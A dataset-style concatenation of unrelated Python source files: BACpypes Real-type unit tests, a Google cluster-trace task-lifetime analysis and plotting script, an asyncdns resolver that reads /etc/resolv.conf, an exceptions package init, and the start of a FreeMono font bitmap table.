        if _debug: real_endec._debug(" - objects match")
@bacpypes_debugging
class TestReal(unittest.TestCase):
    """Unit tests for the Real primitive data type."""

    def test_real(self):
        """A default Real is 0.0; non-numeric input raises TypeError."""
        if _debug: TestReal._debug("test_real")

        obj = Real()
        assert obj.value == 0.0

        with self.assertRaises(TypeError):
            Real("some string")

    def test_real_real(self):
        """Construction from a float keeps the value and its str() form."""
        if _debug: TestReal._debug("test_real_real")

        obj = Real(1.0)
        assert obj.value == 1.0
        assert str(obj) == "Real(1)"

        obj = Real(73.5)
        assert obj.value == 73.5
        assert str(obj) == "Real(73.5)"

    def test_real_tag(self):
        """Only real application tags decode; others raise InvalidTag."""
        if _debug: TestReal._debug("test_real_tag")

        # 3f800000 is IEEE-754 single precision 1.0.
        tag = Tag(Tag.applicationTagClass, Tag.realAppTag, 1, xtob('3f800000'))
        obj = Real(tag)
        assert obj.value == 1.0

        tag = Tag(Tag.applicationTagClass, Tag.booleanAppTag, 0, xtob(''))
        with self.assertRaises(InvalidTag):
            Real(tag)

        tag = Tag(Tag.contextTagClass, 0, 1, xtob('ff'))
        with self.assertRaises(InvalidTag):
            Real(tag)

        tag = Tag(Tag.openingTagClass, 0)
        with self.assertRaises(InvalidTag):
            Real(tag)

    def test_real_copy(self):
        """Copy construction from another Real preserves the value."""
        if _debug: TestReal._debug("test_real_copy")

        obj1 = Real(12)
        obj2 = Real(obj1)
        assert obj2.value == 12

    def test_real_endec(self):
        """Round-trip encode/decode against known IEEE-754 encodings."""
        if _debug: TestReal._debug("test_real_endec")

        # An empty tag payload is not a valid real encoding.
        with self.assertRaises(InvalidTag):
            obj = Real(real_tag(''))

        real_endec(0, '00000000')
        real_endec(1, '3f800000')
        real_endec(-1, 'bf800000')

        real_endec(73.5, '42930000')

        inf = float('inf')
        real_endec(inf, '7f800000')
        real_endec(-inf, 'ff800000')

        nan = float('nan')
        real_endec(nan, '7fc00000')
google_data.py | mfatihaktas/q_sim | 2 | 12762182 | import matplotlib, numpy, pprint
# matplotlib.rcParams['pdf.fonttype'] = 42
# matplotlib.rcParams['ps.fonttype'] = 42
matplotlib.use('Agg')
import matplotlib.pyplot as plot
import gzip, csv, pylab
from collections import namedtuple
from rvs import *
from patch import *
"""
task events table contains the following fields:
1. timestamp
2. missing info
3. job ID
4. task index - within the job
5. machine ID
6. event type
7. user name
8. scheduling class
9. priority
10. resource request for CPU cores
11. resource request for RAM
12. resource request for local disk space
13. different-machine constraint
"""
jobevents_f_to_i = {
'timestamp': 0,
'job id': 2,
'event': 3,
'job name': 6,
'logical job name': 7
}
taskevents_f_to_i = {
'timestamp': 0,
'job id': 2,
'task index': 3,
'event': 5
}
e_to_i = {
'schedule': 1,
'finish': 4
}
def counter_to_furl(counter, obj="task"):
    """Return the path of the gzipped cluster-trace part file for *counter*.

    The trace splits each event table into 500 parts named
    part-00000-of-00500 ... part-00499-of-00500; *obj* selects the table
    directory ("task" or "job").
    """
    # zfill(5) left-pads with zeros, replacing the manual padding arithmetic.
    part = str(counter).zfill(5)
    return "/home/mfa51/google-clusterdata-2011/{}_events/part-{}-of-00500.csv.gz".format(obj, part)
def deneme():
    """Prototype pass: scan the first few task-event part files and dump each
    task's lifetime (|finish - schedule| in seconds) to task_lifetime.dat.

    NOTE(review): "deneme" is Turkish for "trial/experiment"; this looks like
    the exploratory precursor of write_task_lifetimes().
    """
    job_task_i__sch_finish_time_m = {}
    counter = 0
    while 1:
        furl = counter_to_furl(counter)
        try:
            with gzip.open(furl, mode="rt") as f:
                reader = csv.reader(f)
                for line in reader:
                    # "<job id>_<task index>" uniquely identifies a task.
                    i = line[taskevents_f_to_i['job id'] ] + '_' + line[taskevents_f_to_i['task index'] ]
                    e = int(line[taskevents_f_to_i['event'] ] )
                    if e == e_to_i['schedule'] or e == e_to_i['finish']:
                        # Trace timestamps are microseconds; convert to seconds.
                        t = float(line[taskevents_f_to_i['timestamp'] ] )/10**6
                        if i not in job_task_i__sch_finish_time_m:
                            job_task_i__sch_finish_time_m[i] = [t]
                        else:
                            job_task_i__sch_finish_time_m[i].append(t)
        except (OSError, IOError) as e:
            # A missing part file marks the end of the available data.
            log(WARNING, "done with the files.")
            break
        counter += 1
        if counter > 10:
            # Prototype: only the first few part files are scanned.
            break

    with open("task_lifetime.dat", 'wt') as f:
        writer = csv.writer(f, delimiter=',')
        for job_task_i,sch_finish_time in job_task_i__sch_finish_time_m.items():
            if len(sch_finish_time) >= 2:
                # Drop zero timestamps; pad back to two entries if needed.
                sch_finish_time = [t for t in sch_finish_time if t]
                if len(sch_finish_time) == 1:
                    sch_finish_time.append(0)
                # elif len(sch_finish_time) > 2:
                #   log(WARNING, "More than 2 scheduling or finish events for single task; sch_finish_time= {}".format(sch_finish_time) )
                lifetime = abs(sch_finish_time[1] - sch_finish_time[0] )
                writer.writerow([job_task_i, lifetime] )
def write_num_tasks_per_job():
    """Count, per job, the distinct task indices that were ever scheduled and
    append one "job id,count" row per part file to num_tasks.dat.

    A job spanning several part files yields several rows; these are summed
    later by do_possible_merges_in_num_tasks().
    """
    # 'with' guarantees the output file is closed on any exit path (the
    # original opened it manually and leaked the handle on an exception).
    with open("num_tasks.dat", 'wt') as wf:
        writer = csv.writer(wf, delimiter=',')
        counter = 0
        while 1:
            print("counter= {}".format(counter))
            ji__ti_l_m = {}
            furl = counter_to_furl(counter)
            try:
                with gzip.open(furl, mode="rt") as f:
                    reader = csv.reader(f)
                    for line in reader:
                        ji = int(line[taskevents_f_to_i['job id']])
                        ti = int(line[taskevents_f_to_i['task index']])
                        e = int(line[taskevents_f_to_i['event']])
                        if e == e_to_i['schedule']:
                            # A set keeps re-scheduled tasks from counting twice.
                            if ji not in ji__ti_l_m:
                                ji__ti_l_m[ji] = set()
                            ji__ti_l_m[ji].add(ti)
                print("counter= {}, writing now...".format(counter))
                for ji, ti_l in ji__ti_l_m.items():
                    writer.writerow([ji, len(ti_l)])
            except (OSError, IOError) as e:
                # A missing part file marks the end of the available data.
                log(WARNING, "done with the files.")
                break
            counter += 1
            if counter > 510:
                break
def do_possible_merges_in_num_tasks():
    """Sum the per-part task counts in num_tasks.dat into one total per job
    and write the result to num_tasks_merged.dat."""
    totals = {}
    with open("num_tasks.dat", mode="rt") as f:
        for row in csv.reader(f):
            job_id = int(row[0])
            totals[job_id] = totals.get(job_id, 0) + int(row[1])

    with open("num_tasks_merged.dat", mode="wt") as f:
        writer = csv.writer(f, delimiter=',')
        for job_id, total in totals.items():
            writer.writerow([job_id, total])
    log(WARNING, "done.")
def write_jobs_w_num_task(num_task):
    """Write the ids of all jobs with exactly *num_task* tasks to
    jobs_w_num_task_<num_task>.dat, one id per row."""
    with open("num_tasks_merged.dat", mode="rt") as f:
        matching = [int(row[0]) for row in csv.reader(f)
                    if int(row[1]) == num_task]

    print("writing, len(ji_l)= {}".format(len(matching)))
    with open("jobs_w_num_task_{}.dat".format(num_task), mode="wt") as f:
        writer = csv.writer(f, delimiter=',')
        for job_id in matching:
            writer.writerow([job_id])
    log(WARNING, "done.")
def write_task_lifetimes(num_task):
    """For every job with exactly *num_task* tasks, collect each task's
    schedule and finish timestamps across all part files and write the
    lifetimes (finish - schedule, seconds) to
    task_lifetimes_for_jobs_w_num_task_<num_task>.dat.

    Entries whose finish timestamp is not after the schedule timestamp
    (missing events) are dropped.
    """
    log(WARNING, "started; num_task= {}".format(num_task))
    ji_l = []
    with open("jobs_w_num_task_{}.dat".format(num_task), mode="rt") as f:
        reader = csv.reader(f)
        for line in reader:
            ji_l.append(int(line[0]))
    # Use a set for O(1) membership tests; the original scanned the list
    # (O(n)) for every row of every part file.
    ji_s = set(ji_l)
    #
    Entry = namedtuple('Entry', 'ji ti')
    entry__sch_fin_l_m = {}
    counter = 0
    while 1:
        print("counter= {}".format(counter))
        furl = counter_to_furl(counter)
        try:
            with gzip.open(furl, mode="rt") as f:
                reader = csv.reader(f)
                for line in reader:
                    ji = int(line[taskevents_f_to_i['job id']])
                    if ji in ji_s:
                        e = int(line[taskevents_f_to_i['event']])
                        if e == e_to_i['schedule'] or e == e_to_i['finish']:
                            ti = int(line[taskevents_f_to_i['task index']])
                            entry = Entry(ji=ji, ti=ti)
                            # Trace timestamps are microseconds; convert to seconds.
                            t = float(line[taskevents_f_to_i['timestamp']])/10**6
                            if entry not in entry__sch_fin_l_m:
                                entry__sch_fin_l_m[entry] = [0, 0]
                            if e == e_to_i['schedule']:
                                entry__sch_fin_l_m[entry][0] = t
                            elif e == e_to_i['finish']:
                                entry__sch_fin_l_m[entry][1] = t
        except (OSError, IOError) as e:
            # A missing part file marks the end of the available data.
            log(WARNING, "done with the files.")
            break
        counter += 1
        if counter > 510:
            break
    print("writing now...")
    with open("task_lifetimes_for_jobs_w_num_task_{}.dat".format(num_task), mode="wt") as f:
        writer = csv.writer(f, delimiter=',')
        for entry, sch_fin_tuple in entry__sch_fin_l_m.items():
            if sch_fin_tuple[0] < sch_fin_tuple[1]:
                lt = sch_fin_tuple[1] - sch_fin_tuple[0]
                writer.writerow([lt])
    log(WARNING, "done.")
def filter_task_lifetimes(num_task):
    """Copy lifetimes below 5000 s from the raw lifetime file into
    filtered_task_lifetimes_for_jobs_w_num_task_<num_task>.dat."""
    with open("task_lifetimes_for_jobs_w_num_task_{}.dat".format(num_task), mode="rt") as f:
        kept = [float(row[0]) for row in csv.reader(f) if float(row[0]) < 5000]

    with open("filtered_task_lifetimes_for_jobs_w_num_task_{}.dat".format(num_task), mode="wt") as f:
        writer = csv.writer(f, delimiter=',')
        for lt in kept:
            writer.writerow([lt])
    log(WARNING, "done.")
# ****************************** PLOT ***************************** #
def plot_num_tasks_hist():
    """Plot a normalized histogram of tasks-per-job from num_tasks_merged.dat
    and save it as plot_num_tasks_hist.png."""
    num_tasks_l = []
    with open("num_tasks_merged.dat", mode="rt") as f:
        reader = csv.reader(f)
        for line in reader:
            num_task = int(line[1] )
            # if num_task > 1000:
            #   print("num_task= {}".format(num_task) )
            # if num_task > 1 and num_task < 2000:
            num_tasks_l.append(num_task)

    # (exploratory per-count job tally, kept for reference)
    # num_task__num_job_m = {}
    # for n in num_tasks_l:
    #   if n not in num_task__num_job_m:
    #     num_task__num_job_m[n] = 0
    #   num_task__num_job_m[n] += 1
    # print("num_task__num_job_m= {}".format(pprint.pformat(num_task__num_job_m) ) )

    # plot.hist(num_tasks_l, bins=1000, histtype='step')
    # NOTE(review): 'normed' was removed in Matplotlib 3.x; use density=True there.
    plot.hist(num_tasks_l, bins=100, histtype='step', normed=True, lw=2)
    plot.xlabel("Number of tasks")
    plot.ylabel("Frequency")
    plot.savefig("plot_num_tasks_hist.png", bbox_inches='tight')
    plot.gcf().clear()
    log(WARNING, "done.")
def plot_task_lifetime_hist(k):
    """Plot the lifetime distribution for jobs with *k* tasks: a normalized
    histogram (top) plus tail plots on log-linear and log-log axes (bottom);
    saved as plot_task_lifetime_hist_k_<k>.png."""
    lifetime_l = []
    with open("filtered_task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
        reader = csv.reader(f)
        for line in reader:
            lifetime_l.append(float(line[0] ) )
    # (synthetic Pareto data used for sanity checks, kept for reference)
    # rv = Pareto(a=2, loc=2)
    # for i in range(1000000):
    #   lifetime_l.append(rv.gen_sample() )
    lifetime_l = numpy.sort(lifetime_l)
    print("len(lifetime_l)= {}".format(len(lifetime_l) ) )

    fig = plot.figure(1)
    # def_size = fig.get_size_inches()
    # fig.set_size_inches(def_size[0]*1.5, def_size[1] )
    plot.subplot(211)
    # plot.step(x_l, y_l, 'bo', label='log-linear', lw=2)
    # NOTE(review): 'normed' was removed in Matplotlib 3.x; use density=True there.
    plot.hist(lifetime_l, bins=100, histtype='step', normed=True, lw=2)
    plot.xlabel("X (s)")
    plot.ylabel("Frequency")
    plot.title(r'$k= {}$'.format(k) )

    # Empirical tail: lifetimes sorted descending against rank fraction.
    x_l = lifetime_l[::-1]
    y_l = numpy.arange(lifetime_l.size)/lifetime_l.size
    plot.subplot(223)
    plot.yscale('log')
    plot.step(x_l, y_l, 'bo', label='log(tail) vs. X', lw=2)
    plot.xlabel("X (s)")
    plot.ylabel("Tail")
    plot.legend()
    plot.subplot(224)
    plot.xscale('log')
    plot.yscale('log')
    plot.step(x_l, y_l, 'bo', label='log(tail) vs. log(X)', lw=2)
    plot.xlabel("X (s)")
    plot.legend()
    # plot.xlabel("X")
    # plot.xlabel("Task lifetime X (s)")
    # plot.ylabel(r'$Pr\{X > x\}$')

    plot.savefig("plot_task_lifetime_hist_k_{}.png".format(k) )
    plot.gcf().clear()
    log(WARNING, "done; k= {}".format(k) )
def pplot_task_lifetime_hist(k):
    """Plot the empirical tail distribution of task lifetimes for jobs with
    *k* tasks on log-log axes (publication-styled variant) and save it as
    pplot_task_lifetime_hist_k_<k>.png."""
    log(INFO, "started; k= {}".format(k) )
    lifetime_l = []
    # with open("filtered_task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
    with open("task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
        reader = csv.reader(f)
        for line in reader:
            lifetime_l.append(float(line[0] ) )
    lifetime_l = numpy.sort(lifetime_l)
    print("len(lifetime_l)= {}".format(len(lifetime_l) ) )
    #
    # plot.hist(lifetime_l, bins=100, histtype='step', normed=True, lw=2)

    # Empirical tail: lifetimes sorted descending against rank fraction.
    x_l = lifetime_l[::-1]
    y_l = numpy.arange(lifetime_l.size)/lifetime_l.size

    # (abandoned log-linear fit and rank-binning experiments, kept for reference)
    # y_l = [math.log(y + 0.000001) for y in y_l]
    # m, b = numpy.polyfit(x_l, y_l, 1)
    # plot.plot(x_l, m*x_l+b, 'r', lw=1, ls=':')

    # step_size = 10
    # num_rank = math.ceil(x_l[0]/step_size)
    # # rank__avg_lifetime_l = []
    # rank__num_lifetime_l = []
    # i = 0
    # for r in range(1, num_rank+1):
    #   sum_ = 0
    #   counter = 0
    #   while i < len(x_l) and x_l[i] > x_l[0]-r*step_size:
    #     counter += 1
    #     sum_ += x_l[i]
    #     i += 1
    #   rank__num_lifetime_l.append(counter)
    #   # avg = 0
    #   # if counter:
    #   #   avg = sum_/counter
    #   # rank__avg_lifetime_l.append(avg)
    #   # print("i= {}, rank__avg_lifetime_l=\n{}".format(i, rank__avg_lifetime_l) )
    # rank__num_lifetime_l = list(reversed(rank__num_lifetime_l) )
    # rank_freq_l = [n/sum(rank__num_lifetime_l) for n in rank__num_lifetime_l]
    # rank_tailprob_l = [sum(rank_freq_l[r-1:]) for r in range(1, num_rank+1) ]
    # # plot.plot(range(1, num_rank+1), rank__avg_lifetime_l, 'bo', ls=':')
    # # plot.xlabel(r'Rank', fontsize=13)
    # # plot.ylabel(r'Tail distribution', fontsize=13)
    # # plot.step(range(1, num_rank+1), rank_tailprob_l, 'bo', ls=':')
    # # plot.yscale('log')
    # # plot.xscale('log')

    # Hand-tuned axis limits for the k values used in the paper figures.
    if k == 15:
        plot.xlim(([10, 2*10**5] ) )
        plot.ylim(([1/2*10**(-5), 1.3] ) )
    elif k == 400:
        plot.xlim(([10, 2*10**4] ) )
        plot.ylim(([10**(-6), 1.3] ) )
    elif k == 1050:
        plot.xlim(([10, 2*10**4] ) )
        plot.ylim(([10**(-6), 1.3] ) )
    # plot.step(x_l, y_l, 'bo', lw=1, ls=':')
    plot.step(x_l, y_l, 'bo', ms=10, mew=0, ls=':')
    plot.xscale('log')
    plot.yscale('log')
    plot.xlabel(r'Task lifetime', fontsize=18)
    plot.ylabel(r'Tail distribution', fontsize=18)
    # plot.ylabel(r'Fraction of tasks completed in x')
    # plot.title(r'Jobs with {} tasks'.format(k), fontsize=13)
    # plot.title('k= {}, Mean= {}, Stdev= {}'.format(k, round(numpy.mean(x_l), 1), round(numpy.std(x_l), 1) ), fontsize=13)
    plot.title('k= {}, Mean= {}'.format(k, round(numpy.mean(x_l), 1) ), fontsize=18)
    plot.gcf().set_size_inches(4, 3)
    prettify(plot.gca() )
    # plot.savefig("pplot_task_lifetime_hist_k_{}.pdf".format(k) )
    plot.savefig("pplot_task_lifetime_hist_k_{}.png".format(k), bbox_inches='tight')
    plot.gcf().clear()
    log(WARNING, "done; k= {}".format(k) )
def plot_qq_task_lifetimes(k):
    """Q-Q plot of task lifetimes against a reference distribution.

    NOTE(review): both probplot calls are commented out, so as written this
    saves an empty figure to plot_qq_task_lifetimes_k_<k>.png.
    """
    lifetime_l = []
    # with open("filtered_task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
    with open("task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
        reader = csv.reader(f)
        for line in reader:
            lifetime_l.append(float(line[0] ) )
    lifetime_l = numpy.sort(lifetime_l)
    print("len(lifetime_l)= {}".format(len(lifetime_l) ) )

    # For different dists: https://docs.scipy.org/doc/scipy/reference/stats.html
    # scipy.stats.probplot(lifetime_l, dist="expon", plot=plot)
    # scipy.stats.probplot(lifetime_l, dist="pareto", sparams=(1.2,), plot=plot)

    plot.savefig("plot_qq_task_lifetimes_k_{}.png".format(k) )
    log(WARNING, "done; k= {}".format(k) )
if __name__ == "__main__":
    # Pipeline stages are run one at a time by uncommenting the relevant call;
    # the write_* steps re-scan the whole trace and overwrite their outputs.
    ## Uncomment with caution!
    # write_num_tasks_per_job()
    # do_possible_merges_in_num_tasks()
    # write_jobs_w_num_task(num_task=15)
    # write_jobs_w_num_task(num_task=400)
    # write_jobs_w_num_task(num_task=1000)
    # write_jobs_w_num_task(num_task=1050)
    # write_task_lifetimes(num_task=15)
    # filter_task_lifetimes(num_task=15)
    # write_task_lifetimes(num_task=400)
    # filter_task_lifetimes(num_task=400)
    # write_task_lifetimes(num_task=1000)
    # filter_task_lifetimes(num_task=1000)
    # write_task_lifetimes(num_task=1050)
    # filter_task_lifetimes(num_task=1050)

    # plot_num_tasks_hist()
    # plot_task_lifetime_hist(k=15)
    # plot_task_lifetime_hist(k=400)
    # plot_task_lifetime_hist(k=1000)
    # plot_task_lifetime_hist(k=1050)
    # pplot_task_lifetime_hist(k=15)
    # pplot_task_lifetime_hist(k=400)
    # pplot_task_lifetime_hist(k=1000)
    pplot_task_lifetime_hist(k=1050)
    # plot_qq_task_lifetimes(k=400)
    pass
| 2.234375 | 2 |
asyncdns/unix.py | defendertx/asyncdns | 0 | 12762183 | <filename>asyncdns/unix.py
import re
import ipaddress
import time
import os
from .resolver import Resolver, RoundRobinServer, RandomServer
_space_re = re.compile(b'\\s+')
class SystemResolver(Resolver):
    """Resolver that uses the nameservers listed in /etc/resolv.conf.

    The file is re-parsed when its mtime advances; lookups go through the
    configured servers via a RoundRobinServer.
    """

    def __init__(self):
        # Lazily populated from /etc/resolv.conf on the first lookup.
        self._servers = None
        # mtime of /etc/resolv.conf at the time it was last parsed.
        self._servers_timestamp = None
        super(SystemResolver, self).__init__()

    def read_servers(self):
        """Parse /etc/resolv.conf and rebuild the round-robin server list."""
        servers = []
        with open('/etc/resolv.conf', 'rb') as f:
            for line in f:
                line = line.strip()
                if not line or line.startswith(b'#'):
                    continue
                fields = _space_re.split(line)
                if len(fields) < 2:
                    continue
                if fields[0] != b'nameserver':
                    continue
                try:
                    addr = ipaddress.ip_address(fields[1].decode('ascii'))
                except ValueError:
                    # Skip malformed addresses rather than failing the parse.
                    continue
                # Standard DNS port 53 for every configured server.
                servers.append((addr, 53))
        self._servers = RoundRobinServer(servers)

    def maybe_read_servers(self):
        """Re-read /etc/resolv.conf if it appears to have changed.

        NOTE(review): the 30-second guard compares wall-clock time against the
        file's *mtime* (not against when we last checked), so a resolv.conf
        older than 30 s gets stat()ed on every lookup - confirm intended.
        """
        now = time.time()
        if self._servers_timestamp is not None \
           and now - self._servers_timestamp < 30:
            return

        s = os.stat('/etc/resolv.conf')
        if self._servers_timestamp is None \
           or s.st_mtime > self._servers_timestamp:
            self._servers_timestamp = s.st_mtime
            self.read_servers()

    def lookup(self, query,
               should_cache=True, recursive=False, prefer_ipv6=False):
        """Resolve *query* using the system-configured nameservers."""
        self.maybe_read_servers()
        return super(SystemResolver, self).lookup(query, self._servers,
                                                  should_cache,
                                                  recursive, prefer_ipv6)
| 2.671875 | 3 |
calculator/exception/__init__.py | kamilcieslik/test_house_price_lib | 0 | 12762184 | from .construction_year_violation_exception import ConstructionYearViolationException
from .flat_parameter_mismatch_exception import FlatParameterMismatchException
| 1.195313 | 1 |
fonts/FreeMono9pt7b.py | cnobile2012/Python-TFT | 0 | 12762185 | FreeMono9pt7bBitmaps = [
0xAA, 0xA8, 0x0C, 0xED, 0x24, 0x92, 0x48, 0x24, 0x48, 0x91, 0x2F, 0xE4,
0x89, 0x7F, 0x28, 0x51, 0x22, 0x40, 0x08, 0x3E, 0x62, 0x40, 0x30, 0x0E,
0x01, 0x81, 0xC3, 0xBE, 0x08, 0x08, 0x71, 0x12, 0x23, 0x80, 0x23, 0xB8,
0x0E, 0x22, 0x44, 0x70, 0x38, 0x81, 0x02, 0x06, 0x1A, 0x65, 0x46, 0xC8,
0xEC, 0xE9, 0x24, 0x5A, 0xAA, 0xA9, 0x40, 0xA9, 0x55, 0x5A, 0x80, 0x10,
0x22, 0x4B, 0xE3, 0x05, 0x11, 0x00, 0x10, 0x20, 0x47, 0xF1, 0x02, 0x04,
0x00, 0x6B, 0x48, 0xFF, 0x00, 0xF0, 0x02, 0x08, 0x10, 0x60, 0x81, 0x04,
0x08, 0x20, 0x41, 0x02, 0x08, 0x00, 0x38, 0x8A, 0x0C, 0x18, 0x30, 0x60,
0xC1, 0x82, 0x88, 0xE0, 0x27, 0x28, 0x42, 0x10, 0x84, 0x21, 0x3E, 0x38,
0x8A, 0x08, 0x10, 0x20, 0x82, 0x08, 0x61, 0x03, 0xF8, 0x7C, 0x06, 0x02,
0x02, 0x1C, 0x06, 0x01, 0x01, 0x01, 0x42, 0x3C, 0x18, 0xA2, 0x92, 0x8A,
0x28, 0xBF, 0x08, 0x21, 0xC0, 0x7C, 0x81, 0x03, 0xE4, 0x40, 0x40, 0x81,
0x03, 0x88, 0xE0, 0x1E, 0x41, 0x04, 0x0B, 0x98, 0xB0, 0xC1, 0xC2, 0x88,
0xE0, 0xFE, 0x04, 0x08, 0x20, 0x40, 0x82, 0x04, 0x08, 0x20, 0x40, 0x38,
0x8A, 0x0C, 0x14, 0x47, 0x11, 0x41, 0x83, 0x8C, 0xE0, 0x38, 0x8A, 0x1C,
0x18, 0x68, 0xCE, 0x81, 0x04, 0x13, 0xC0, 0xF0, 0x0F, 0x6C, 0x00, 0xD2,
0xD2, 0x00, 0x03, 0x04, 0x18, 0x60, 0x60, 0x18, 0x04, 0x03, 0xFF, 0x80,
0x00, 0x1F, 0xF0, 0x40, 0x18, 0x03, 0x00, 0x60, 0x20, 0x60, 0xC0, 0x80,
0x3D, 0x84, 0x08, 0x30, 0xC2, 0x00, 0x00, 0x00, 0x30, 0x3C, 0x46, 0x82,
0x8E, 0xB2, 0xA2, 0xA2, 0x9F, 0x80, 0x80, 0x40, 0x3C, 0x3C, 0x01, 0x40,
0x28, 0x09, 0x01, 0x10, 0x42, 0x0F, 0xC1, 0x04, 0x40, 0x9E, 0x3C, 0xFE,
0x21, 0x90, 0x48, 0x67, 0xE2, 0x09, 0x02, 0x81, 0x41, 0xFF, 0x80, 0x3E,
0xB0, 0xF0, 0x30, 0x08, 0x04, 0x02, 0x00, 0x80, 0x60, 0x8F, 0x80, 0xFE,
0x21, 0x90, 0x68, 0x14, 0x0A, 0x05, 0x02, 0x83, 0x43, 0x7F, 0x00, 0xFF,
0x20, 0x90, 0x08, 0x87, 0xC2, 0x21, 0x00, 0x81, 0x40, 0xFF, 0xC0, 0xFF,
0xA0, 0x50, 0x08, 0x87, 0xC2, 0x21, 0x00, 0x80, 0x40, 0x78, 0x00, 0x1E,
0x98, 0x6C, 0x0A, 0x00, 0x80, 0x20, 0xF8, 0x0B, 0x02, 0x60, 0x87, 0xC0,
0xE3, 0xA0, 0x90, 0x48, 0x27, 0xF2, 0x09, 0x04, 0x82, 0x41, 0x71, 0xC0,
0xF9, 0x08, 0x42, 0x10, 0x84, 0x27, 0xC0, 0x1F, 0x02, 0x02, 0x02, 0x02,
0x02, 0x82, 0x82, 0xC6, 0x78, 0xE3, 0xA1, 0x11, 0x09, 0x05, 0x83, 0x21,
0x08, 0x84, 0x41, 0x70, 0xC0, 0xE0, 0x40, 0x40, 0x40, 0x40, 0x40, 0x41,
0x41, 0x41, 0xFF, 0xE0, 0xEC, 0x19, 0x45, 0x28, 0xA4, 0xA4, 0x94, 0x91,
0x12, 0x02, 0x40, 0x5C, 0x1C, 0xC3, 0xB0, 0x94, 0x4A, 0x24, 0x92, 0x49,
0x14, 0x8A, 0x43, 0x70, 0x80, 0x1E, 0x31, 0x90, 0x50, 0x18, 0x0C, 0x06,
0x02, 0x82, 0x63, 0x0F, 0x00, 0xFE, 0x43, 0x41, 0x41, 0x42, 0x7C, 0x40,
0x40, 0x40, 0xF0, 0x1C, 0x31, 0x90, 0x50, 0x18, 0x0C, 0x06, 0x02, 0x82,
0x63, 0x1F, 0x04, 0x07, 0x92, 0x30, 0xFE, 0x21, 0x90, 0x48, 0x24, 0x23,
0xE1, 0x10, 0x84, 0x41, 0x70, 0xC0, 0x3A, 0xCD, 0x0A, 0x03, 0x01, 0x80,
0xC1, 0xC7, 0x78, 0xFF, 0xC4, 0x62, 0x21, 0x00, 0x80, 0x40, 0x20, 0x10,
0x08, 0x1F, 0x00, 0xE3, 0xA0, 0x90, 0x48, 0x24, 0x12, 0x09, 0x04, 0x82,
0x22, 0x0E, 0x00, 0xF1, 0xE8, 0x10, 0x82, 0x10, 0x42, 0x10, 0x22, 0x04,
0x80, 0x50, 0x0C, 0x00, 0x80, 0xF1, 0xE8, 0x09, 0x11, 0x25, 0x44, 0xA8,
0x55, 0x0C, 0xA1, 0x8C, 0x31, 0x84, 0x30, 0xE3, 0xA0, 0x88, 0x82, 0x80,
0x80, 0xC0, 0x90, 0x44, 0x41, 0x71, 0xC0, 0xE3, 0xA0, 0x88, 0x82, 0x81,
0x40, 0x40, 0x20, 0x10, 0x08, 0x1F, 0x00, 0xFD, 0x0A, 0x20, 0x81, 0x04,
0x10, 0x21, 0x83, 0xFC, 0xEA, 0xAA, 0xAA, 0xC0, 0x80, 0x81, 0x03, 0x02,
0x04, 0x04, 0x08, 0x08, 0x10, 0x10, 0x20, 0x20, 0xD5, 0x55, 0x55, 0xC0,
0x10, 0x51, 0x22, 0x28, 0x20, 0xFF, 0xE0, 0x88, 0x80, 0x7E, 0x00, 0x80,
0x47, 0xEC, 0x14, 0x0A, 0x0C, 0xFB, 0xC0, 0x20, 0x10, 0x0B, 0xC6, 0x12,
0x05, 0x02, 0x81, 0x40, 0xB0, 0xB7, 0x80, 0x3A, 0x8E, 0x0C, 0x08, 0x10,
0x10, 0x9E, 0x03, 0x00, 0x80, 0x47, 0xA4, 0x34, 0x0A, 0x05, 0x02, 0x81,
0x21, 0x8F, 0x60, 0x3C, 0x43, 0x81, 0xFF, 0x80, 0x80, 0x61, 0x3E, 0x3D,
0x04, 0x3E, 0x41, 0x04, 0x10, 0x41, 0x0F, 0x80, 0x3D, 0xA1, 0xA0, 0x50,
0x28, 0x14, 0x09, 0x0C, 0x7A, 0x01, 0x01, 0x87, 0x80, 0xC0, 0x20, 0x10,
0x0B, 0xC6, 0x32, 0x09, 0x04, 0x82, 0x41, 0x20, 0xB8, 0xE0, 0x10, 0x01,
0xC0, 0x81, 0x02, 0x04, 0x08, 0x11, 0xFC, 0x10, 0x3E, 0x10, 0x84, 0x21,
0x08, 0x42, 0x3F, 0x00, 0xC0, 0x40, 0x40, 0x4F, 0x44, 0x58, 0x70, 0x48,
0x44, 0x42, 0xC7, 0x70, 0x20, 0x40, 0x81, 0x02, 0x04, 0x08, 0x10, 0x23,
0xF8, 0xB7, 0x64, 0x62, 0x31, 0x18, 0x8C, 0x46, 0x23, 0x91, 0x5E, 0x31,
0x90, 0x48, 0x24, 0x12, 0x09, 0x05, 0xC7, 0x3E, 0x31, 0xA0, 0x30, 0x18,
0x0C, 0x05, 0x8C, 0x7C, 0xDE, 0x30, 0x90, 0x28, 0x14, 0x0A, 0x05, 0x84,
0xBC, 0x40, 0x20, 0x38, 0x00, 0x3D, 0xA1, 0xA0, 0x50, 0x28, 0x14, 0x09,
0x0C, 0x7A, 0x01, 0x00, 0x80, 0xE0, 0xCE, 0xA1, 0x82, 0x04, 0x08, 0x10,
0x7C, 0x3A, 0x8D, 0x0B, 0x80, 0xF0, 0x70, 0xDE, 0x40, 0x40, 0xFC, 0x40,
0x40, 0x40, 0x40, 0x40, 0x41, 0x3E, 0xC3, 0x41, 0x41, 0x41, 0x41, 0x41,
0x43, 0x3D, 0xE3, 0xA0, 0x90, 0x84, 0x42, 0x20, 0xA0, 0x50, 0x10, 0xE3,
0xC0, 0x92, 0x4B, 0x25, 0x92, 0xA9, 0x98, 0x44, 0xE3, 0x31, 0x05, 0x01,
0x01, 0x41, 0x11, 0x05, 0xC7, 0xE3, 0xA0, 0x90, 0x84, 0x42, 0x40, 0xA0,
0x60, 0x10, 0x10, 0x08, 0x3E, 0x00, 0xFD, 0x08, 0x20, 0x82, 0x08, 0x10,
0xBF, 0x29, 0x24, 0xA2, 0x49, 0x26, 0xFF, 0xF8, 0x89, 0x24, 0x8A, 0x49,
0x2C, 0x61, 0x24, 0x30 ]
FreeMono9pt7bGlyphs = [
[ 0, 0, 0, 11, 0, 1 ], # 0x20 ' '
[ 0, 2, 11, 11, 4, -10 ], # 0x21 '!'
[ 3, 6, 5, 11, 2, -10 ], # 0x22 '"'
[ 7, 7, 12, 11, 2, -10 ], # 0x23 '#'
